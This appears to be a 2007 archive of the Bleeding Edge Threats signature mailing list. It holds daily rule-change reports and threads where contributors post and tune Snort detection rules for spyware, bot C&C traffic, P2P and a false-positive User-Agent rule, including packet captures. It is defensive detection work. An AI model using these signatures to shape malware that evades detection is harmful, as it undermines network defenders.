    2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
    2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
    2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
    2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
    2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules)
    2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules)
    2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules)
    2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules)
    2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules)
    2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules)
    2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules)
    2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[---] Disabled rules: [---]

    2003361 - BLEEDING-EDGE Malware My Search Spyware Config Download 2 (bleeding-malware.rules)
    2003393 - BLEEDING-EDGE Malware My Search Spyware Config Download 3
(bleeding-malware.rules) [---] Removed rules: [---] 2404007 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 8) (bleeding-botcc.rules) 2405007 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 109 -> Added to bleeding-drop.rules (1): # VERSION 109 -> Added to bleeding-malware.rules (4): #by Matt Jonkman, from Spyware Listening Post data #Replaced by the above pcre #by Jacob Kitchel #by Matt Jonkman, from Spyware Listening Post data -> Added to bleeding-p2p.rules (2): #by Jeff Kell. Depth is correct, it's got 2 byte sway to compensate for 36 or 38 byte offset #Depth and offset added by Jeff Kell -> Added to bleeding-policy.rules (6): #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com #by Jamian Mason of Deepnines.com -> Added to bleeding-sid-msg.map (25): 2003428 || BLEEDING-EDGE MALWARE Surfaccuracy.com Spyware Install User-Agent (SF Installer) 2003436 || BLEEDING-EDGE TROJAN Warezov/Stration Communicating with Controller 2 || url,www.avira.com/en/threats/section/fulldetails/id_vir/3242/tr_dldr.warezov.df.html || url,www.sophos.com/security/analyses/w32strationbo.html 2003437 || BLEEDING-EDGE P2P Ares over UDP 2003438 || BLEEDING-EDGE MALWARE Abcsearch.com Spyware Reporting 2003439 || BLEEDING-EDGE MALWARE Dropspam.com Spyware Install User-Agent (DSInstall) 2003440 || BLEEDING-EDGE MALWARE Dropspam.com Spyware Reporting 2003441 || BLEEDING-EDGE MALWARE Webbuying.net Spyware Install User-Agent (wbi_v0.90) 2003442 || BLEEDING-EDGE MALWARE Webbuying.net Spyware Installing 2003444 || BLEEDING-EDGE MALWARE Deskwizz.com Spyware Install Code Download 2003445 || BLEEDING-EDGE MALWARE Deskwizz.com Spyware Install INI Download 2003446 || BLEEDING-EDGE MALWARE Adware Command Client Checkin || 
url,www.nuker.com/container/details/adware_command.php 2003447 || BLEEDING-EDGE MALWARE Humanclick.com Client Checkin 2003448 || BLEEDING-EDGE MALWARE Humanclick.com Client Update 2003449 || BLEEDING-EDGE MALWARE Webbuying.net Spyware Install User-Agent 2 (wb v1.6.4) 2003450 || BLEEDING-EDGE MALWARE Specificclick.net Spyware Activity 2003451 || BLEEDING-EDGE MALWARE K8l.info Spyware Activity 2003452 || BLEEDING-EDGE MALWARE LoopAd/Secure-browser.com Spyware User-Agent (rw.exe) 2003453 || BLEEDING-EDGE POLICY Netvacy.com Anonymizing Proxy Access 2003454 || BLEEDING-EDGE POLICY Yahoo 360 Social Site Access 2003455 || BLEEDING-EDGE POLICY Hi5.com Social Site Access 2003456 || BLEEDING-EDGE POLICY Gazzag.com Social Site Access 2003457 || BLEEDING-EDGE POLICY Metacafe.com Social Site Access 2003458 || BLEEDING-EDGE POLICY Orkut.com Social Site Access 2003460 || BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet || url,doc.bleedingthreats.net/2003460 2003461 || BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet || url,doc.bleedingthreats.net/2003460 -> Added to bleeding-virus.rules (1): #Matt Jonkman, found by Jacob Kitchel -> Added to bleeding.rules (3): #So far unidentified bot and c&c channel. Working on it. These are crude sigs, # please let me know if you get hits. Need more information on this one. 
#Matt Jonkman [---] Removed non-rule lines: [---] -> Removed from bleeding-drop-BLOCK.rules (1): # VERSION 95 -> Removed from bleeding-drop.rules (1): # VERSION 95 -> Removed from bleeding-sid-msg.map (3): 2003428 || BLEEDING-EDGE MALWARE Surfaccuracy.com Spyware Install User-Agent (SF Installe) 2404007 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 8) || url,www.shadowserver.org 2405007 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE || url,www.shadowserver.org -> Removed from bleeding-virus.rules (1): #Matt Jonkman, found by axn jxn From axnjxnind at gmail.com Fri Mar 2 15:22:06 2007 From: axnjxnind at gmail.com (axn jxn) Date: Fri Mar 2 15:22:34 2007 Subject: [Bleeding-sigs] cooldeskalert spyware Message-ID: <5219f7470703020722k7e3a78a7n81387b9d5cbdce6a@mail.gmail.com> Here are a couple of sigs for CoolDeskAlert, which ties in to the cpvfeed ad network: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Install"; flow: to_server,established; uricontent:"/alert/get_xml"; content:"deskbar_id={"; nocase; reference:url,cooldeskalert.com; reference:url,www.benedelman.org/spyware/images/bannerfarms-ad_w_a_r_e-globalstore-log-061006.html; classtype: trojan-activity; sid: ; rev:1; ) kind of generic, but there weren't any other user agents like this: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar)"; flow:to_server,established; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Toolbar/i"; classtype:trojan-activity; sid:; rev:1;) Jacob From jonkman at bleedingthreats.net Fri Mar 2 16:12:43 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Fri Mar 2 16:13:23 2007 Subject: [Bleeding-sigs] cooldeskalert spyware In-Reply-To: <5219f7470703020722k7e3a78a7n81387b9d5cbdce6a@mail.gmail.com> References: <5219f7470703020722k7e3a78a7n81387b9d5cbdce6a@mail.gmail.com> Message-ID: 
<45E84CFB.9030506@bleedingthreats.net>

References and everything! Awesome. :)

Thanks Jacob. Posting these now.

Matt

axn jxn wrote:
> Here are a couple of sigs for CoolDeskAlert, which ties in to the cpvfeed ad network:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Install"; flow: to_server,established; uricontent:"/alert/get_xml"; content:"deskbar_id={"; nocase; reference:url,cooldeskalert.com; reference:url,www.benedelman.org/spyware/images/bannerfarms-ad_w_a_r_e-globalstore-log-061006.html; classtype: trojan-activity; sid: ; rev:1; )
>
> kind of generic, but there weren't any other user agents like this:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar)"; flow:to_server,established; content:"User-Agent\:"; nocase; pcre:"/User-Agent\:[^\n]+Toolbar/i"; classtype:trojan-activity; sid:; rev:1;)
>
> Jacob
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs

-- 
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------
PGP: http://www.bleedingthreats.com/mattjonkman.asc


From bleeding at bleedingthreats.net  Fri Mar 2 18:00:07 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Fri Mar 2 18:00:17 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes
Message-ID: <20070302180007.B51E522C088@sb03.us.bleedingsnort.com>

[***] Results from Oinkmaster started Fri Mar 2 18:00:07 2007 [***]

[+++] Added rules: [+++]

 2003462 - BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Activity (bleeding-malware.rules)
 2003463 - BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar) or others (bleeding-malware.rules)

[///] Modified active rules: [///]

 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules)
 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules)
 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules)
 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules)
 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules)
 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules)
 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules)
 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]

 -> Added to bleeding-drop-BLOCK.rules (1):
 # VERSION 110
 -> Added to bleeding-drop.rules (1):
 # VERSION 110
 -> Added to bleeding-sid-msg.map (2):
 2003462 || BLEEDING-EDGE MALWARE CoolDeskAlert Spyware Activity || url,www.benedelman.org/spyware/images/bannerfarms-ad_w_a_r_e-globalstore-log-061006.html || url,cooldeskalert.com
 2003463 || BLEEDING-EDGE MALWARE CoolDeskAlert.com Adware User-Agent (Toolbar) or others

[---] Removed non-rule lines: [---]

 -> Removed from bleeding-drop-BLOCK.rules (1):
 # VERSION 109
 -> Removed from bleeding-drop.rules (1):
 # VERSION 109


From jonkman at bleedingthreats.net  Mon Mar 5 15:04:16 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Mon Mar 5 15:04:46 2007
Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082
In-Reply-To: <200703051459.28464.thierry.chich@ac-clermont.fr>
References: <200703051459.28464.thierry.chich@ac-clermont.fr>
Message-ID: <45EC3170.2040000@bleedingthreats.net>

This one can false on occasion, but shouldn't be that often, not in my experience at least. But I've not heard of anything headed to microsoft sites.

Are you sure of what's on that box? Can you share the URLs that were being requested?

The term Client as a user agent is VERY strange. The most unusual thing I've seen MS products use was "Microsoft Internet Explorer".
Which unfortunately is used by several trojans and spyware packages.

Also note: many trojans make a dummy request to microsoft.com to check connectivity and their ability to get to the internet. That's why I'd like to see the URLs...

Anyone else seeing significant falses on this one of late?

Let's move the rest of the conversation over to bleeding-sigs, I've cc'd that list. This is a bleeding rule.

Matt

Thierry CHICH wrote:
> A lot of FP with rule 2002082:
>
> /etc/snort/rules/bleeding-policy.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "BLEEDING-EDGE POLICY Infotriever Spyware User Agent"; flow: to_server,established; content:"User-Agent\: Client"; nocase; classtype: trojan-activity; reference:url,www.infotriever.com/Intro_SysAdmins.asp; sid: 2002082; rev:6;)
>
> For instance, I have FP from packets going to microsoft servers. I can't believe that there could be spyware in microsoft products. It must be a false positive.
>
> For instance:
>
> 10.163.234.246:33794 -> 207.68.179.219:80 [AP]
> GET /_0sfdata/1?aa=5:18:58:03&ab=3806&ac=438&ad=134&ae=44&af=260&ag=211&ah=0&ai=51&aj=100&ak=1&al=36&nr=21&cg=%7bb3bb5bba-e7d5-40ab-a041-a5b1c0b26c8f%7d HTTP/1.0..User-Agent: Client..Host: g.microsoft.com..Via: 1.1 localhost.localdomain:8080 (squid/2.5.STABLE10)..X-Forwarded-For: 10.63.234.35, 127.0.0.1..Cache-Control: max-age=259200..Connection: keep-alive....
>
> I also join a pcap version of some packets.
>
> Thierry Chich
>
> ------------------------------------------------------------------------
>
> Host: g.microsoft.com
> Via: 1.1 localhost.localdomain:8080 (squid/2.5.STABLE10)
> X-Forwarded-For: 10.63.234.35, 127.0.0.1
> Cache-Control: max-age=259200
> Connection: keep-alive
>
> User-Agent: Client
> Host: g.microsoft.com
> Cookie: WT_FPC=id=194.254.206.115-673196624.29836356:lv=1170645054265:ss=1170673369265; MC1=GUID=cea72d125e26d643a94c506c4a94b44f&HASH=122d&LV=20071&V=3; msresearch=1
> Via: 1.1 localhost.localdomain:8080 (squid/2.5.STABLE10)
> X-Forwarded-For: 192.168.224.2, 127.0.0.1
> Cache-Control: max-age=259200
> Connection: keep-alive
>
> User-Agent: Client
> Host: g.microsoft.com
> Cookie: WT_FPC=id=194.254.206.115-673196624.29836356:lv=1170645054265:ss=1170673369265; MC1=GUID=cea72d125e26d643a94c506c4a94b44f&HASH=122d&LV=20071&V=3; msresearch=1
> Via: 1.1 localhost.localdomain:8080 (squid/2.5.STABLE10)
> X-Forwarded-For: 192.168.224.2, 127.0.0.1
> Cache-Control: max-age=259200
> Connection: keep-alive
>
> ------------------------------------------------------------------------
>
> -------------------------------------------------------------------------
> Take Surveys. Earn Cash. Influence the Future of IT
> Join SourceForge.net's Techsay panel and you'll get the chance to share your
> opinions on IT & business topics through brief surveys-and earn cash
> http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs


From jonkman at bleedingthreats.net  Mon Mar 5 23:40:32 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Mon Mar 5 23:40:59 2007
Subject: [Bleeding-sigs] Re: [Snort-sigs] revised edonkey sigs using flowbits
In-Reply-To: <45ECA308.6090509@auckland.ac.nz>
References: <45ECA308.6090509@auckland.ac.nz>
Message-ID: <45ECAA70.701@bleedingthreats.net>

Very nice Russell! I'll get these posted asap

Matt

Russell Fulton wrote:
> Hi Folks,
>
> I tweaked these two rules to first set and then check Flowbits:
>
> alert udp $HOME_NET 1024:65535 -> $EXTERNAL_NET 1024:65535 (msg:"BLEEDING-EDGE P2P Edonkey udp IP Request"; dsize:4; content:"|e3 1b|"; depth:2; flowbits:set, edk.ip.requestect; flowbits:noalert; classtype:policy-violation; reference:url,www.giac.org/certified_professionals/practicals/gcih/0446.php; sid:2013308; rev:1;)
> alert udp $EXTERNAL_NET 1024:65535 -> $HOME_NET 1024:65535 (msg:"BLEEDING-EDGE P2P Edonkey IP Transaction"; dsize:<20; content:"|e3 1c|"; depth:2; flowbits: isset, edk.ip.requestect; classtype:policy-violation; reference:url,www.giac.org/certified_professionals/practicals/gcih/0446.php; sid:2013309; rev:1;)
>
> I then ran them alongside the original and they detected all the replies.
>
> The rules need their sids unmangled and revs changed if they are to be added to the distribution. Flowbits works fine with udp flows :)
>
> Russell


From thierry.chich at ac-clermont.fr  Tue Mar 6 08:51:21 2007
From: thierry.chich at ac-clermont.fr (Thierry CHICH)
Date: Tue Mar 6 16:11:04 2007
Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082
In-Reply-To: <45EC3170.2040000@bleedingthreats.net>
References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45EC3170.2040000@bleedingthreats.net>
Message-ID: <200703060951.21413.thierry.chich@ac-clermont.fr>

On Monday 5 March 2007 at 16:04, you wrote:
> This one can false on occasion, but shouldn't be that often, not in my experience at least. But I've not heard of anything headed to microsoft sites.
>
> Are you sure of what's on that box? Can you share the URLs that were being requested?

I am not sure what you mean exactly. I am seeing these packets coming from a lot of different computers, from different locations (I am snorting on a MAN). The url is given in the capture I gave: http://g.microsoft.com/_0sfdata/1 with a lot of parameters, for instance:
?aa=0:00:43:15&ab=269&ac=202&ad=3&ae=186&af=13&ag=100&ah=1&ai=8&aj=100&ak=0&al=5&nr=1&cg=%7bb3bb5bba-e7d5-40ab-a041-a5b1c0b26c8f%7d

When there are cookies, they are interesting, for instance: MC1=GUID=9133497a45a7b341862a5e06e0bad7a3&HASH=7a49&LV=20071&V=3
It seems that these cookies are pretty common in Microsoft applications. It looks like the request for downloading codecs: http://www.tutorials-se.com/mediaplayer/mediaplayer-27.html

> The term Client as a user agent is VERY strange. The most unusual thing I've seen MS products use was "Microsoft Internet Explorer". Which unfortunately is used by several trojans and spyware packages.

I agree.

> Also note: many trojans make a dummy request to microsoft.com to check connectivity and their ability to get to the internet. That's why I'd like to see the URLs...
>
> Anyone else seeing significant falses on this one of late?

I would be really astonished if it were a trojan and I were the only one with this kind of alert. I have it in a lot of locations. If it is spreading, it has already spread on the MAN I manage, and I could not understand why it would not have spread elsewhere.

> Let's move the rest of the conversation over to bleeding-sigs, I've cc'd that list. This is a bleeding rule.

Ok.

> Matt

Thierry


From jonkman at bleedingthreats.net  Tue Mar 6 16:20:19 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Tue Mar 6 16:22:08 2007
Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082
In-Reply-To: <200703060951.21413.thierry.chich@ac-clermont.fr>
References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45EC3170.2040000@bleedingthreats.net> <200703060951.21413.thierry.chich@ac-clermont.fr>
Message-ID: <45ED94C3.4090902@bleedingthreats.net>

Thierry CHICH wrote:
>> Are you sure of what's on that box? Can you share the URLs that were being requested?
>
> I am not sure what you mean exactly. I am seeing these packets coming from a lot of different computers, from different locations (I am snorting on a MAN). The url is given in the capture I gave: http://g.microsoft.com/_0sfdata/1 with a lot of parameters, for instance:
> ?aa=0:00:43:15&ab=269&ac=202&ad=3&ae=186&af=13&ag=100&ah=1&ai=8&aj=100&ak=0&al=5&nr=1&cg=%7bb3bb5bba-e7d5-40ab-a041-a5b1c0b26c8f%7d

Hmmm. Maybe we need to just add:

content:"Host\:"; nocase; content:!"microsoft.com"; distance:0; nocase;

Or better:

pcre:!"/Host\: \S+\.microsoft\.com$/i";

>> The term Client as a user agent is VERY strange. The most unusual thing I've seen MS products use was "Microsoft Internet Explorer". Which unfortunately is used by several trojans and spyware packages.
>
> I agree.

Anyone seeing hits on domains other than microsoft.com?

Matt


From jonkman at bleedingthreats.net  Tue Mar 6 17:51:15 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Tue Mar 6 17:49:44 2007
Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082
In-Reply-To: <45ED94C3.4090902@bleedingthreats.net>
References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45EC3170.2040000@bleedingthreats.net> <200703060951.21413.thierry.chich@ac-clermont.fr> <45ED94C3.4090902@bleedingthreats.net>
Message-ID: <45EDAA13.30209@bleedingthreats.net>

Further thought: How about this:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE POLICY Unusual User Agent (Client)"; flow:to_server,established; content:"User-Agent\: Client|0d 0a|"; nocase; content:!".microsoft.com|0d 0a|"; nocase; classtype: trojan-activity; reference:url,doc.bleedingthreats.net/2002082; sid:2002082; rev:7;)

Posted for testing.
Matt

Matt Jonkman wrote:
> Thierry CHICH wrote:
>>> Are you sure of what's on that box? Can you share the URLs that were being requested?
>>
>> I am not sure what you mean exactly. I am seeing these packets coming from a lot of different computers, from different locations (I am snorting on a MAN). The url is given in the capture I gave: http://g.microsoft.com/_0sfdata/1 with a lot of parameters, for instance:
>> ?aa=0:00:43:15&ab=269&ac=202&ad=3&ae=186&af=13&ag=100&ah=1&ai=8&aj=100&ak=0&al=5&nr=1&cg=%7bb3bb5bba-e7d5-40ab-a041-a5b1c0b26c8f%7d
>
> Hmmm. Maybe we need to just add:
>
> content:"Host\:"; nocase; content:!"microsoft.com"; distance:0; nocase;
>
> Or better:
>
> pcre:!"/Host\: \S+\.microsoft\.com$/i";
>
>>> The term Client as a user agent is VERY strange. The most unusual thing I've seen MS products use was "Microsoft Internet Explorer". Which unfortunately is used by several trojans and spyware packages.
>> I agree.
>
> Anyone seeing hits on domains other than microsoft.com?
>
> Matt


From bleeding at bleedingthreats.net  Tue Mar 6 18:00:07 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Tue Mar 6 18:00:13 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes
Message-ID: <20070306180007.1076322C0AA@sb03.us.bleedingsnort.com>

[***] Results from Oinkmaster started Tue Mar 6 18:00:07 2007 [***]

[+++] Added rules: [+++]

 2003464 - BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (warFTPd) (bleeding-attack_response.rules)
 2003465 - BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (freeFTPd) (bleeding-attack_response.rules)

[///] Modified active rules: [///]

 2002082 - BLEEDING-EDGE POLICY Unusual User Agent (Client) (bleeding-policy.rules)
 2002383 - BLEEDING-EDGE SCAN Potential FTP Brute-Force attempt (bleeding-scan.rules)
 2003308 - BLEEDING-EDGE P2P Edonkey IP Request (bleeding-p2p.rules)
 2003309 - BLEEDING-EDGE P2P Edonkey IP Reply (bleeding-p2p.rules)
 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules)
 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules)
 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules)
 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules)
 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules)
 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules)
 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules)
 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]

 -> Added to bleeding-drop-BLOCK.rules (1):
 # VERSION 114
 -> Added to bleeding-drop.rules (1):
 # VERSION 114
 -> Added to bleeding-policy.rules (1):
 #Moved from Malware, this is likely not spyware related
 -> Added to bleeding-scan.rules (1):
 #by atomic-penguin, tweak by matt Jonkman to cover other ftp daemons like freeftpd and warftpd
 -> Added to bleeding-sid-msg.map (3):
 2002082 || BLEEDING-EDGE POLICY Unusual User Agent (Client) || url,doc.bleedingthreats.net/2002082
 2003464 || BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (warFTPd) || url,www.warftp.org
 2003465 || BLEEDING-EDGE ATTACK RESPONSE Unusual FTP Server Banner (freeFTPd) || url,www.freeftp.com

[---] Removed non-rule lines: [---]

 -> Removed from bleeding-drop-BLOCK.rules (1):
 # VERSION 110
 -> Removed from bleeding-drop.rules (1):
 # VERSION 110
 -> Removed from bleeding-policy.rules (1):
 #Moved from Malware, this is not spyware related
 -> Removed from bleeding-scan.rules (1):
 #by atomic-penguin
 -> Removed from bleeding-sid-msg.map (1):
 2002082 || BLEEDING-EDGE POLICY Infotriever Spyware User Agent || url,www.infotriever.com/Intro_SysAdmins.asp


From jonkman at bleedingthreats.net  Tue Mar 6 18:59:24 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Tue Mar 6 18:57:44 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Wiki out of Beta
Message-ID: <45EDBA0C.1050508@bleedingthreats.net>

